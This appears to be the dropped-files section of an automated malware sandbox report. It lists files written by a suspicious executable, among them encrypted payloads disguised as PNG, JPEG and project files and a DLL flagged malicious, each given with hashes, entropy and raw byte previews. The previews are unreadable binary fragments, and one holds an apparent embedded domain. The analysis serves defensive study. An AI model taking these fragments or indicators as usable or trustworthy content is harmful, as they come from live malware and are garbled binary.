Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: 13478674376-78423498.01.exe, Detection: malicious, Browse Filename: 1387457-38765948.15.exe, Detection: malicious, Browse Filename: 2976587-987347589.07.exe, Detection: malicious, Browse Filename: 2976587-987347589.08.exe, Detection: malicious, Browse Filename: 2873466535874-68348745.02.exe, Detection: malicious, Browse Filename: 2362476847-83854387.07.exe, Detection: malicious, Browse Filename: 2o63254452-763487230.06.exe, Detection: malicious, Browse Filename: e2664726330-76546233.05.exe, Detection: malicious, Browse Filename: 23567791246-764698008.02.exe, Detection: malicious, Browse Filename: 287438657364-7643738421.08.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........%U..vU..vU..vK.pvL..vK.avE..vK.wv...v\.gv\..vU..v...vK.~vW..vK.`vT..vK.evT..vRichU..v........PE..L....B.O.................b...@....................@..................................g....@.....................................d.......\................-..........P...............................0...@............................................text....a.......b.................. ..`.rdata...............f..............@..@.data...............................@....rsrc...\...........................@..@.reloc..`...........................@..B........................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\1pZu9Rh\log.src

Download File

Process:	C:\Program Files (x86)\YYAfLM\YYAfLM.exe
File Type:	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	5059989
Entropy (8bit):	7.999955228389576
Encrypted:	true
SSDEEP:	98304:uOQ8oQBU091MWehE/7o29Mtr9vBGTrBkm638mgfttxtoSrHCYE7GUcOc2s:Bo6T1MFhE/7qJwBP6TWtttriYE7kjv
MD5:	90DB79F3C5CF0EF36AA0B9AB518FCE51
SHA1:	1381B1A4CCE64A20384272199B548250B2C1A17C
SHA-256:	983F95B3890A3BB982B2993535F3D9730B5679E0C6235FC3854E62914C90A385
SHA-512:	8B126C4075970BBAF9FAE842624821786F832B955E6D969B165B4EED25319FB6C85A207AD759A3291C0E8FA70CAF82381C3EE8DD7B5194744F86E12EA495F561
Malicious:	false
Preview:	.PNG........IHDR.............\r.f....pHYs............... .IDATx....n.....&E!J.%M.."..9....."...H..L.....LI:.)..K7..!.4Q...{..d.....[......Z{......<.y<9.o...w....]...q..q..q..!..q..q..q..q..q..q..q..q..q..q..q..q..q......3%.F.1p..rD%.;%rD.1p.....qz.....1n.....p.....qz.....1n...0.^.I..9......c.Z....$.Q..K=.OKp=...e%.(.R.....p-tzD..9.m...+.Un...S...5..F..D......R.ys.?W.....\|]....Ke......G......U..1....#^..1\|..!.O.OWr.H.w.P..p.V..H.wz..mo.U....?F......k7[2.."....+...&]#..d......<...V\{P..d...8=.9..Al....Wr......Pc`......X.g..\.\|i7.....O.B.g.p...]..%.^..T.w....a.u..x..zZ........V.....$.Y.6.t....?.g.~..@.93.g.....lPn..o...7.p.J.Cq....J....3.<]...X...w..o..\.u...Jv...3e.).9q..6(..s...^.k...#..[Vr.t.47J}..M......:.....I%.Q\cPN.n...R.z;3J..c....q.].~s.J..._.d.........y....ur{:v...A.I%....)....t{..(.g.o...;....>..7)~{P~_.....5t{X<.x....J....J.0..YY\b.-&.?...Y7.$.X_.e.......{..Jd.3w...l......q.M...&..*...~f...[./.......w..U.^.{q.`......GVV...5.;Z.`W.-uxV...

C:\Program Files (x86)\1pZu9Rh\tbcore3U.dll

Download File

Process:	C:\Program Files (x86)\YYAfLM\YYAfLM.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4858192
Entropy (8bit):	7.9925166958603695
Encrypted:	true
SSDEEP:	98304:9RK1dm+O6P0DvHI/Tvyegz2UrrrjRyBEXp0/aeuZmQQLFXfoGku+i17/t:9S4+O6P5OeMRrjRy7aPZbm3k8V/t
MD5:	57F86B992FDC583297AAA4A2497841B0
SHA1:	C6A91C16965F294E2EE2B390A021D1DE2108B2E3
SHA-256:	74189A4248FC0090410DBFCE2A5D9E11F607E99EDC3C0B62521043AC56BE9362
SHA-512:	2EAAD8F8C513008A4BF6DE55F9670AC133894B8147CD1119B0CCAA0A7CD65A19230FD6AC0C8D5F7206E765C5D8C75BB91F8A9D4F52A80ACC3706210C9670C9BC
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...~..f...........!...'.,..........D)D......@................................s...........@...........................3.R.....D.P....ps...............I.(K...Ps......................................Ks.@.............).,............................text...s+.......................... ..`.rdata...n...@......................@..@.data...............................@....%?.....O.'......................... ..`.%-[....\|.....).....................@....mo:....P.I...)...I................. ..`.reloc.......Ps.......I.............@..@.rsrc........ps.......I.............@..@................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\1pZu9Rh\utils.vcxproj

Download File

Process:	C:\Program Files (x86)\YYAfLM\YYAfLM.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
Category:	dropped
Size (bytes):	365477
Entropy (8bit):	7.999400141095349
Encrypted:	true
SSDEEP:	6144:9iACk/u6n9aBOmmD1oQFu0oMOxKnJPWyD9Dcqt1oFsnKqW7mbZ:08u69CghoQxoMTFQqtKFCG7mbZ
MD5:	A3874D1A9F2B9FF292302841B9D34C62
SHA1:	B068601B9BCD2C514775BB96D5BE67E0D8F5FD3B
SHA-256:	88A6814FDF79B1780F9D9D7E18DF616780F682593BB517388162260B4CEF0382
SHA-512:	28815B4916C9E99DD4D6C11C1B0C2509B9D97FD40ABF005FE0A287E558540CA43C60DE7E2EE0F51DFA8B669DDF55706B5E15D51DAA4B80D4D24C7372DC4C6EAD
Malicious:	false
Preview:	......JFIF.............ZExif..MM..................J............Q...........Q..........%Q..........%...............C....................................................................C.......!...............................................................7.K.."............................................................}........!1A...a."q.2....#B...R..$3br........%&'()456789:CDEF8.210.209.78....."ijstuvwxyz....gnkygm.net......3#..............209.78....................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......"..;...i6QE................HJJKLINOP..ST.VWXYZ[\.^_`abcdefghijklmnopqrstuvwxyz{\|}~........=..>.A

C:\Program Files (x86)\YYAfLM\YYAfLM.exe

Download File

Process:	C:\Users\user\Documents\RgZ5EJ.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	54152
Entropy (8bit):	6.64786972992462
Encrypted:	false
SSDEEP:	768:jE8w9LlgD9z/4vt+aEjzaXEjoN6Fdv9SqJvwjgCb2VIIL/o/rw3J:jE3LKDZjaEjza0jJRJviN21ME3J
MD5:	7B6586E21FBC8F2F0BB784A1A8FC65B4
SHA1:	E33722B4790B3C83B6F180E57D1B6BEBBC6153CB
SHA-256:	7BAFB7B02EA7C52D3511F3AC21C0586E92C44738AD992D63463AADC260C81722
SHA-512:	E2B4B8F5379D3ADBB5280D1C77C2AA7F5A7212173231576BAC6D7A26109B88BC5CB377CF9D879E7BE2E36CE860C9BCDA7769A22EED5ED63797F70534C6CDDA4C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........%U..vU..vU..vK.pvL..vK.avE..vK.wv...v\.gv\..vU..v...vK.~vW..vK.`vT..vK.evT..vRichU..v........PE..L....B.O.................b...@....................@..................................g....@.....................................d.......\................-..........P...............................0...@............................................text....a.......b.................. ..`.rdata...............f..............@..@.data...............................@....rsrc...\...........................@..@.reloc..`...........................@..B........................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\YYAfLM\log.src

Download File

Process:	C:\Users\user\Documents\RgZ5EJ.exe
File Type:	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	5059989
Entropy (8bit):	7.999955229498315
Encrypted:	true
SSDEEP:	98304:eOQ8oQBU091MWehE/7o29Mtr9vBGTrBkm638mgfttxtoSrHCYE7GUcOc2s:xo6T1MFhE/7qJwBP6TWtttriYE7kjv
MD5:	EE3A9A3B0BBD8CEE911E6970D79A271D
SHA1:	125D763486FE7B2B3655AAF5837DC25940BFA0E6
SHA-256:	053745DBF2CB0E8A86D594BDA504E48D3177E0FC38F82F5EC9180619A18CFE6E
SHA-512:	449B623360B1C40C9F12F7A6028179196B7A01AB40BAF781F47772060ED49813365615733A7BD19DA21288F3380B17DA3E78665CF8EF636C4A2E0045F468BC36
Malicious:	false
Preview:	.PNG........IHDR.............\r.f....pHYs............... .IDATx....n.....&E!J.%M.."..9....."...H..L.....LI:.)..K7..!.4Q...{..d.....[......Z{......<.y<9.o...w....]...q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q......3%.F.1p..rD%.;%rD.1p.....qz.....1n.....p.....qz.....1n...0.^.I..9......c.Z....$.Q..K=.OKp=...e%.(.R.....p-tzD..9.m...+.Un...S...5..F..D......R.ys.?W.....\|]....Ke......G......U..1....#^..1\|..!.O.OWr.H.w.P..p.V..H.wz..mo.U....?F......k7[2.."....+...&]#..d......<...V\{P..d...8=.9..Al....Wr......Pc`......X.g..\.\|i7.....O.B.g.p...]..%.^..T.w....a.u..x..zZ........V.....$.Y.6.t....?.g.~..@.93.g.....lPn..o...7.p.J.Cq....J....3.<]...X...w..o..\.u...Jv...3e.).9q..6(..s...^.k...#..[Vr.t.47J}..M......:.....I%.Q\cPN.n...R.z;3J..c....q.].~s.J..._.d.........y....ur{:v...A.I%....)....t{..(.g.o...;....>..7)~{P~_.....5t{X<.x....J....J.0..YY\b.-&.?...Y7.$.X_.e.......{..Jd.3w...l......q.M...&..*...~f...[./.......w..U.^.{q.`......GVV...5.;Z.`W.-uxV...

C:\Program Files (x86)\YYAfLM\tbcore3U.dll

Download File

Process:	C:\Users\user\Documents\RgZ5EJ.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4858192
Entropy (8bit):	7.992517215888184
Encrypted:	true
SSDEEP:	98304:9RK1dm+O6P0DvHI/Tvyegz2UrrrjRyBEXp0/aeuZmQQLFXfoGku+i17/H:9S4+O6P5OeMRrjRy7aPZbm3k8V/H
MD5:	3C86E1B609CC24BF982A7B992C556D4E
SHA1:	AACA91709429911C2F97E46D971092A2E8394F07
SHA-256:	C5B35B73F0A052F21FF0DF0498BF21B2A422F52003B12F925F4E8618CF8D337E
SHA-512:	8F0A58CC2FF267B57C880100A5C8DE4E9B3EC537AB0179831BB7FA5A96F6CA799B84AE18215D075F387D2E2F0CD4C8EC2FF1BCBCE0CEB235BE734400B726865A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...~..f...........!...'.,..........D)D......@................................s...........@...........................3.R.....D.P....ps...............I.(K...Ps......................................Ks.@.............).,............................text...s+.......................... ..`.rdata...n...@......................@..@.data...............................@....%?.....O.'......................... ..`.%-[....\|.....).....................@....mo:....P.I...)...I................. ..`.reloc.......Ps.......I.............@..@.rsrc........ps.......I.............@..@................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\YYAfLM\utils.vcxproj

Download File

Process:	C:\Users\user\Documents\RgZ5EJ.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
Category:	dropped
Size (bytes):	365477
Entropy (8bit):	7.999399973747196
Encrypted:	true
SSDEEP:	6144:CiACk/u6n9aBOmmD1oQFu0oMOxKnJPWyD9Dcqt1oFsnKqW7mbZ:d8u69CghoQxoMTFQqtKFCG7mbZ
MD5:	151DB2780397711AAAF5385CA6244CA7
SHA1:	02E703720E5DF576C743A47EEECA26D89C509834
SHA-256:	316665F53DF1404DF6AAFF994BC0C706ECCB57B12070E996A599C1A33285D83F
SHA-512:	4C8C4AFB2B5BC70A5810CC1F2E9E8FF1BCA95307C17F00B0F9B39206FE6CFCAE625474F26856BAC936AF97521663A12EFBA58D6E07B070AC66A9F8E87D78DE52
Malicious:	false
Preview:	......JFIF.............ZExif..MM..................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A...a."q.2....#B...R..$3br........%&'()456789:CDEF8.210.209.78....."ijstuvwxyz....gnkygm.net......3#..............209.78....................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......"..;...i6QE................HJJKLINOP..ST.VWXYZ[\.^_`abcdefghijklmnopqrstuvwxyz{\|}~........=..>.A

C:\Users\Public\Music\destopbak.ini

Download File

Process:	C:\Users\user\Documents\RgZ5EJ.exe
File Type:	MIPSEB MIPS-III ECOFF executable
Category:	modified
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:s:s
MD5:	7E74F75663E5B5A4F3452A4C603EE45D
SHA1:	D5114B086B721F2C87EA7152025792958AB4C629
SHA-256:	DD1E2826C0124A6D4F7397A5A71F633928926C0608B62FB9E615BA778ACC39FF
SHA-512:	2F5D0D45593487BEBC2CCF968EAF2A4A3BDE1D5A29C7C2B5AD411E041C0D3B7A46BE439ED7083093057A96030683B9DEFBED1A2EF7882B3E64CF3FBC7C9CF12F
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	.@

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\FOM-53[1].jpg

Download File

Process:	C:\Users\user\Documents\RgZ5EJ.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
Category:	dropped
Size (bytes):	366410
Entropy (8bit):	7.375315637594966
Encrypted:	false
SSDEEP:	6144:XC/wwzn9iJzBFsJmUSmfXVz7pB+iMuVrt5DY:9ws7FsJmUSmd7pBpMgR58
MD5:	DA1D5EB665D3AAD523BE59415E6449ED
SHA1:	40C310E82035381410B83E4F1DA0A4410FEB8FE6
SHA-256:	F919634AC7E0877663FFF06EA9E430B530073D6E79EEE543D02331F4DFF64375
SHA-512:	6F179A166126C97444920636B584FB0BA4E9596A659921A2BCAA80E7DE094A87402D3E2B6D8DA8797045D7E22C3D37E6CED2A8E137E0387A1320D631B139FD36
Malicious:	false
Preview:	......JFIF.............ZExif..MM..................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEF..................ijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......"..;...i6QE.................IZ....OQPSS.U.WX..[..&6.ab.)eLghibkinoouqrsuuvw2zy{}}~.............

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\d[1].gif

Download File

Process:	C:\Users\user\Desktop\149876985-734579485.05.exe
File Type:	PNG image data, 512 x 512, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	3892010
Entropy (8bit):	7.995495589600101
Encrypted:	true
SSDEEP:	98304:NAHrPzE9m4wgyNskyumYyryfxFVLqndnA1Nfjh:j5wgHh/nyZLN1
MD5:	E4E46F3980A9D799B1BD7FC408F488A3
SHA1:	977461A1885C7216E787E5B1E0C752DC2067733A
SHA-256:	6166EF3871E1952B05BCE5A08A1DB685E27BD83AF83B0F92AF20139DC81A4850
SHA-512:	9BF3B43D27685D59F6D5690C6CDEB5E1343F40B3739DDCACD265E1B4A5EFB2431102289E30734411DF4203121238867FDE178DA3760DA537BAF0DA07CC86FCB4
Malicious:	false
Preview:	.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........\|..z....\|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\f[1].dat

Download File

Process:	C:\Users\user\Documents\RgZ5EJ.exe
File Type:	data
Category:	dropped
Size (bytes):	879
Entropy (8bit):	4.5851931774575325
Encrypted:	false
SSDEEP:	6:JRSscjAQ7F3Y+ZcRC60rdimzYFAQT7LE/o2xjC:fSscjHRY+ZcRAdimzo/OY
MD5:	E54C4296F011EC91D935AA353C936E34
SHA1:	53A3313D40696E87C9B8CE2BE7E67BE49DD34C20
SHA-256:	81FF16AEDF9C5225CE8A03C0608CC3EA417795D98345699F2C240A0D67C6C33D
SHA-512:	5D1FBA60BE82A33341E5B9E7D3C1E7B0DCC9A41B4C1F97F2930141A808D62AF56D8697CB0D2FD4894A6080DF98A3E4EEF9D98A6003C292C588F547E1C6F84DE1
Malicious:	false
Preview:	.V.Wf4e111111111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW11111111111111111111.BTE5k1=I=======.NXI9g%&A&&&&&&&NRRV%lyyKK..:{ggJ..J"+$-WEBXv941HD_R!\|1=P.{r?_GBl(2%%%%%%%%%%%%%%%%%%%%%%%%%%%%%MQQU&ozzHH..9xddI..I!('.TFA[u:72KG\Q".2>S.xq<\D@n0'''''''''''''''''''''''''''''OSSW$mxxJJ..;zffK..K#%,VDCYw850IE^S }0<Q.zs>^FAo+1&&&&&&&&&&&&&&&&&&&&&&&&&&&&&NRRV%lyyKK..:{ggJ..J"+$-WEBXv941HD_R!\|1=P.{r?_GAo+1&&&&&&&&&&&&&&&&&&&&&&&&&&&&&....&&&&....&&&&....&&&9\A\999999999999999999999M[ZV$3e.-goooooooooooooooooooooooooooooooooooooo...A23"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA45(-^.[N6><!K!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\i[1].dat

Download File

Process:	C:\Users\user\Desktop\149876985-734579485.05.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	5.26512450612984
Encrypted:	false
SSDEEP:	6:WUGUsW11j2lCrCa2BIDRhCgcTiv16QyM7OdUzW9E40/qcX:NGU311hMBIDRh5BNdyWgUzWg3
MD5:	0C3C81CC59CB35FD96753C541097C3E8
SHA1:	20B1A99339A1FA77838A659BD795043FEB3A8188
SHA-256:	3E78F5E06792F69F0224A89C874771D73F8B83F1C4CE00E9C768E026E4746979
SHA-512:	EDD26B7DA762C0AAAD7278489D476211B5A0ED57C7DDD49CC3483754D1A755DE9AB40ADE3EAD6562CCAD1BD20450B2ECEC7003728687E17A92E07E0A0F9C45AD
Malicious:	false
Preview:	....l%00[XUS`*}<OO._1r=:SPST3z58QAMV5%x5ZX.Tz3=222222222222222222222222222222222ZFFB1xmm....=w a..L.l/`g....n'he....hx%h..G.$mclllllllllllllllllllllllllllllllll....o&33X[VPc)~?LL.\2q>9PSPW0y6;RBNU6&{6Y[.U{2<333333333333333333333333333333333[GGC0yll....<v!`..M.m.af....o&id....iy$i..F.#jdkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk....~ss1TIT1111111111111111111111111111111111111GBT]2:s9UU99999999999999999999999999999999999999nVK]-<9.rwo~.P..................................QoQl ...6\|ylllllllllllllllllllllllllllllllllllll

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\FOM-51[1].jpg

Download File

Process:	C:\Users\user\Documents\RgZ5EJ.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
Category:	dropped
Size (bytes):	4859125
Entropy (8bit):	7.999956261017207
Encrypted:	true
SSDEEP:	98304:iwS8fBFQmSDP3eB/FsE7wRnIdq//xvpY/gMQ+nQxcweXxpuQ6SutPQNCG0o:iwSgTQfFAwdCqRvpk5QvxcwgXMSutTo
MD5:	EE6CA3EEA7F9B1C81059AEF570A28C02
SHA1:	14EFBF498356644D9B1327407E3F03E1BFBEA363
SHA-256:	A2065EA035C4E391C0FD897A932DCFF34D2CCD34579844C732F3577BC443B196
SHA-512:	563E7D7AB4A94505F1EFA5931F685A45D89CCB27A97593BF69C668AAA747C9511C8BE2AADA2E4DF3E9AB02559B564C699A8A9501B70420FAC3556758E29478D5
Malicious:	false
Preview:	......JFIF.............ZExif..MM..................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEF..................ijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......"..;...i6QE................HJJKLINOP..ST.VWXYZ[\.^_`abcdefghijklmnopqrstuvwxyz{\|}~........=..>.A

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\b[1].gif

Download File

Process:	C:\Users\user\Desktop\149876985-734579485.05.exe
File Type:	PNG image data, 512 x 512, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	125333
Entropy (8bit):	7.993522712936246
Encrypted:	true
SSDEEP:	3072:8vcsO9vKcSrCpJigTY1mZzj283zsY+oOVoPj24pq:8vcXfSWT3TY1mZf13zB+a72Uq
MD5:	2CA9F4AB0970AA58989D66D9458F8701
SHA1:	FE5271A6D2EEBB8B3E8E9ECBA00D7FE16ABA7A5B
SHA-256:	5536F773A5F358F174026758FFAE165D3A94C9C6A29471385A46C1598CFB2AD4
SHA-512:	AB0EF92793407EFF3A5D427C6CB21FE73C59220A92E38EDEE3FAACB7FD4E0D43E9A1CF65135724686B1C6B5D37B8278800D102B0329614CB5478B9CECB5423C7
Malicious:	false
Preview:	.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........\|..z....\|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\s[1].jpg

Download File

Process:	C:\Users\user\Desktop\149876985-734579485.05.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
Category:	dropped
Size (bytes):	8299
Entropy (8bit):	7.9354275320361545
Encrypted:	false
SSDEEP:	192:plfK6KTBKkGUy8DJdg0ANCT/0E/jiG4hMrnv2:pBK6KTBZGWvg0ANCT/WGFv2
MD5:	9BDB6A4AF681470B85A3D46AF5A4F2A7
SHA1:	D26F6151AC12EDC6FC157CBEE69DFD378FE8BF8A
SHA-256:	5207B0111DC5CC23DA549559A8968EE36E39B5D8776E6F5B1E6BDC367937E7DF
SHA-512:	5930985458806AF51D54196F10C3A72776EFDDA5D914F60A9B7F2DD04156288D1B8C4EB63C6EFD4A9F573E48B7B9EFE98DE815629DDD64FED8D9221A6FB8AAF4
Malicious:	false
Preview:	......JFIF.............ZExif..MM..................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEF..................ijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......"..;...i6QE...............CHI........[..>G..C..&.!7..E..)U&.$...z.tuv......?..............

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\FOM-52[1].jpg

Download File

Process:	C:\Users\user\Documents\RgZ5EJ.exe
File Type:	PNG image data, 512 x 512, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	5062442
Entropy (8bit):	7.999518892518095
Encrypted:	true
SSDEEP:	98304:GIusCrIENkeXPV97kqmCf4P48E37aREUXr7VYyUOhez2IlpmURniNmJ:Xngv7NmCAPLTREQVb8/RomJ
MD5:	70C21DA900796B279A09040B00953E40
SHA1:	7CD3690B1FDDE033CD47E657FC4FC3A423DF716F
SHA-256:	901330243EF0F7F0AAE4F610693DA751873E5B632E5F39B98E3DB64859D78CBC
SHA-512:	851F4ED843F5D47C93D6C5A7D1895A674B6448631B567A0CCB2DF5873E4A5E722F28ECFC4D0D3220A86309481F9793FCDDA4F89BD993FB79CD09DBED29423752
Malicious:	false
Preview:	.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........\|..z....\|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\c[1].gif

Download File

Process:	C:\Users\user\Desktop\149876985-734579485.05.exe
File Type:	PNG image data, 512 x 512, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	10681
Entropy (8bit):	7.866148090449211
Encrypted:	false
SSDEEP:	192:fN3El4oBtN9pmD65VoeotpeGy/nmgVtKFbM/PvMZ5ZWtZl4EehHGXI9Fch5:fN3E7NW27oJWJ+M/8ZCDuEe2I9FS5
